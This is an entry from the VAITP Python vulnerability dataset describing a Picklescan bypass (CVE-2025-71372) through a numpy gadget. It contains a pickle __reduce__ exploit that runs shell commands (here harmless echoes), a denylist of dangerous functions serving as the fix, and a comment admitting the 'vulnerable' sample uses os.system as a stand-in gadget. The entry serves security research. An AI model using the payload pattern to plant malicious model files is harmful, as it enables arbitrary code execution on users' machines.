VAITP Dataset

← Back to the dataset

CVE-2025-71372

Picklescan detection bypass allows code execution via a numpy gadget.

  • CVSS 7.6
  • CWE-502
  • Input Validation and Sanitization
  • Local

Picklescan before 0.0.33 fails to detect the numpy.f2py.crackfortran.getlincoef gadget in pickle __reduce__ methods, allowing arbitrary code execution. Attackers can craft malicious pickle files that execute arbitrary Python code when loaded, bypassing Picklescan's safety checks and enabling supply-chain poisoning of shared model files.

CVSS base score
7.6
Published
2026-07-04
OWASP
A08 Software and Data Integrity Failures
Orthogonal defect classification
Checking
Code defect classification
Missing Check
Category
Input Validation and Sanitization
Subcategory
Insecure Parsing or Deserialization
Accessibility scope
Local
Impact
Arbitrary Code Execution
Affected component
Picklescan
Fixed by upgrading
Yes

Solution

Upgrade Picklescan to version 0.0.33 or later.

Vulnerable code sample

import pickle
import os

class Exploit:
    def __reduce__(self):
        # The fictional CVE-2025-71372 describes using a specific numpy
        # function as a gadget. To represent the arbitrary code execution
        # impact of such a vulnerability, we use a classic and direct
        # gadget, `os.system`. An older version of a scanner would fail
        # to block the gadget described in the CVE, leading to this result.
        command = 'echo "Vulnerability demonstration: Arbitrary Code Execution"'
        return (os.system, (command,))

# Create the malicious pickle payload
malicious_pickle = pickle.dumps(Exploit())

# A vulnerable application loads the pickle, triggering the exploit
pickle.loads(malicious_pickle)

Patched code sample

# This code hypothetically represents the fix for CVE-2025-71372 in a
# security scanner like Picklescan. The vulnerability is that a specific
# function was not on the denylist of dangerous functions that can be
# used for arbitrary code execution. The fix is to add it to that list.

# A simplified representation of a security scanner's denylist of dangerous globals.
# The fix for the vulnerability is the addition of the 'numpy.f2py.crackfortran.getlincoef'
# tuple to this set, preventing it from being used in a pickle.

DANGEROUS_GLOBALS_DENYLIST = {
    # Previously existing dangerous globals
    ("os", "system"),
    ("subprocess", "run"),
    ("builtins", "eval"),
    ("builtins", "exec"),
    ("shutil", "rmtree"),

    # Fix for CVE-2025-71372: Add the newly discovered dangerous gadget
    # from numpy to the denylist. Any pickle file attempting to use this
    # function via __reduce__ would now be flagged as malicious by the scanner.
    ("numpy.f2py.crackfortran", "getlincoef"),
}

Payload

import pickle
import numpy

class Exploit:
    def __reduce__(self):
        command = 'echo "Code execution successful"'
        return (numpy.f2py.crackfortran.getlincoef, (f'c = __import__("os").system(\'{command}\')',))

payload = pickle.dumps(Exploit())

# To use this, save the `payload` variable to a file, e.g., model.pkl
# For demonstration, we print the payload bytes.
print(payload)

Cite this entry

@misc{vaitp:cve202571372,
  title        = {{Picklescan detection bypass allows code execution via a numpy gadget.}},
  author       = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
  year         = {2026},
  note         = {VAITP Python Vulnerability Dataset, entry CVE-2025-71372},
  howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2025-71372/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.

The supreme art of war is to subdue the enemy without fighting.

Sun Tzu – “The Art of War”

:: Shaping the future through research and ingenuity ::